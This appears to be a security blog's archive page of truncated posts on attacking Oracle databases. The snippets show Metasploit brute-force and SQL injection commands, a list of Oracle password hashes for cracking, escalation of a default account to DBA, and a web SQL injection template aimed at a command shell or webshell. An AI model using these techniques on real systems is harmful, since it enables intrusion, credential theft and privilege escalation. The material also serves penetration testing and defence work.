Author: CG
In some of the past posts I covered finding a default user account or an account with an easy-to-guess username/password for Oracle and taking that user to DBA via SQL injection in Oracle packages.
I’ve been neglecting the blog a bit, porting some of the public SQLi for Oracle into Metasploit auxiliary modules. Not sure when it’s going to be put into the trunk, but it will be at some point; I think MC is working on the mixin to reduce the dependence on the Oracle instantclient.
Read more »
Tags: Oracle,
Pwnage
Posted by CG
Thanks to dentonj for pointing out to me that there was an Oracle patch for John the Ripper.
I used the john from this site:
http://www.banquise.net/misc/patch-john.html
http://btb.banquise.net/bin/myjohn.tgz
cg@segfault:~/evil/john/run$ more oraclehashes
SCOTT:F894844C34402B67
SYS:E0F3062B9648608A
SYSTEM:7AD9669C7FE693C1
DBSNMP:E066D214D5421CCC
PROD:2E817F456CE5A4EC
TEST:7A0F2B316C212D67
Read more »
Tags: Oracle,
Pwnage
Posted by CG
Thanks MC for this one…
http://metasploit.com/users/mc/oracle9i/brute_login.rb
msf > use auxiliary/admin/oracle/brute_login
msf auxiliary(brute_login) > set RHOST 172.16.102.130
RHOST => 172.16.102.130
msf auxiliary(brute_login) > info
Read more »
Tags: Metasploit,
Oracle,
Pwnage
Posted by CG
Sorry no metasploit for this one.
But
I did get asked how to get the SCOTT/TIGER username and password. I left a (hint) in the first blog post, but by request here is the link:
http://www.petefinnigan.com/default/default_password_checker.htm
Second thing was that you may find yourself with some Oracle hashes after some crafty (well, not really) SQL queries. Something that probably looks like this:
[*] DBSNMP,E066D214D5421CCC
[*] SCOTT,F894844C34402B67
[*] XDB,88D8364765FCE6AF
Read more »
Tags: Oracle,
Pwnage
Posted by CG
Last post we got to where we could execute SQL queries on the box and were able to see Scott’s permissions.
Let’s use the SQLI auxiliary modules to see if we can add the DBA privilege to Scott’s account.
As you recall….
msf auxiliary(oracle_sql) > run
[*] Sending SQL…
[*] SCOTT,CONNECT,NO,YES,NO
[*] SCOTT,RESOURCE,NO,YES,NO
[*] Done…
[*] Auxiliary module execution completed
Read more »
Tags: Metasploit,
Oracle,
Pwnage
Posted by CG
Every so often you come across an open 1521 on a pentest.
1521/tcp open oracle
But what to do? There aren’t a ton of what I consider usable Oracle exploits out there, and the ones that are there involve installing a bunch of extra libraries, and we know that’s “tough” to do. Thankfully MC has done all the work for us and created the Metasploit mixin and modules. **Need help getting the mixin installed? See my file format post.
Read more »
Tags: Metasploit,
Oracle,
Pwnage
Source: WEB安全手册 (Web Security Handbook)
Originally published in 黑客手册 (Hacker’s Handbook)
Sharp Oracle injection techniques
linx 2008.1.12
This article introduces a method for obtaining a cmdshell on the host directly through Oracle injection over the web.
All of the demonstrations below were run in SQL*Plus on the web. When injecting over the web, change select SYS.DBMS_EXPORT_EXTENSION….. into the form
/xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION…..)
(the 'a'|| is there to make the statement return true).
The statement is rather long, so you may need to submit it via POST.
The individual steps follow:
Read more »
Tags: Oracle,
SQL Injection,
SQL Injection (SQL注入)
Author: kj021320
Please credit the source when reposting.
Honestly, with a database as powerful as ORACLE there is really no need for such a crude approach.
Writing files from an SQLJ stored procedure works too, but what if you are forced into it because the target machine does not support SQLJ and the UTL_FILE package has been removed as well?
Then you can also use the method I describe below.
Read more »
Tags: Oracle,
WebShell